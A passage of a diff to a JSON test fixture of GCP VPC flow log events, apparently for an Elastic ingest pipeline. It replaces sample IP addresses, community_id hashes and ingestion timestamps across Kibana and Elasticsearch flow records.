ork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:48:50.642206049Z", "end": "2019-06-14T03:48:50.757255245Z", @@ -7097,9 +7097,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 58216, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -7113,7 +7113,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5iAZA+PYVbiwpnPFNQCxKlsIp60=", + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7128,7 +7128,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -7152,8 +7152,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868677300Z", - "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391552500Z", + "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", "end": "2019-06-14T03:49:36.982303071Z", @@ -7174,10 +7174,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7191,7 +7191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kmlKCdqw/+vcFaSeBx9hVkJjnAE=", + "community_id": "1:C7B7lD6dSCm1Xnh0Cv/Rl2jt7CY=", "bytes": 60222, "name": "default", "transport": "tcp", @@ -7214,7 +7214,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -7250,8 +7250,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868680700Z", - "original": "{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391558100Z", + "original": "{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", "end": "2019-06-14T03:49:59.597279654Z", @@ -7272,10 +7272,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7289,7 +7289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8Fb+m/uf2rxjkmtxbzg2YY6RXUU=", + "community_id": "1:XmuS4IfRKFgBkcu5l3y4LFKss2g=", "bytes": 61810, "name": "default", "transport": "tcp", @@ -7312,7 +7312,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -7348,8 +7348,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868683900Z", - "original": "{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391562800Z", + "original": "{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -7376,17 +7376,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 58216, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5iAZA+PYVbiwpnPFNQCxKlsIp60=", + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -7400,7 +7400,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -7425,8 +7425,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868686900Z", - "original": "{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391566200Z", + "original": "{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", "end": "2019-06-14T03:49:36.982303071Z", @@ -7453,18 +7453,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 136558, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 243 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8Fb+m/uf2rxjkmtxbzg2YY6RXUU=", + "community_id": "1:XmuS4IfRKFgBkcu5l3y4LFKss2g=", "bytes": 136558, "name": "default", "transport": "tcp", @@ -7486,7 +7486,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -7523,8 +7523,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868690Z", - "original": "{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391570400Z", + "original": "{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -7545,9 +7545,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34906, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7561,7 +7561,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jbQzsE/elxbdsdcfLH3Z+WY7yoA=", + "community_id": "1:w9XiZoaEVIGVzEG0jduGM1uQWNw=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7576,7 +7576,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -7600,8 +7600,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868693100Z", - "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391575400Z", + "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:48:50.642206049Z", "end": "2019-06-14T03:48:50.757255245Z", @@ -7622,9 +7622,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52454, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -7638,7 +7638,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:x8E1sBwJRB/brRn7+TWuuDv6Seg=", + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7653,7 +7653,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -7677,8 +7677,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868696200Z", - "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391580300Z", + "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", "end": "2019-06-14T03:42:40.888804332Z", @@ -7705,17 +7705,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34090, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Tx2SSXIplYZjqzTurpvVWc2USh0=", + "community_id": "1:r0YXIwQbyBtxc4laQWML5QBB+Tw=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -7729,7 +7729,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -7754,8 +7754,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868699300Z", - "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391584100Z", + "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:37.712749588Z", "end": "2019-06-14T03:46:37.827345444Z", @@ -7782,18 +7782,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 170396, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ZvwQ2j/3ZuFaLSX6WH5V4iy9utU=", + "community_id": "1:IEnrf1LJAN4LjLMkDE8yTRHo3KA=", "bytes": 170396, "name": "default", "transport": "tcp", @@ -7815,7 +7815,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -7852,8 +7852,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868702300Z", - "original": 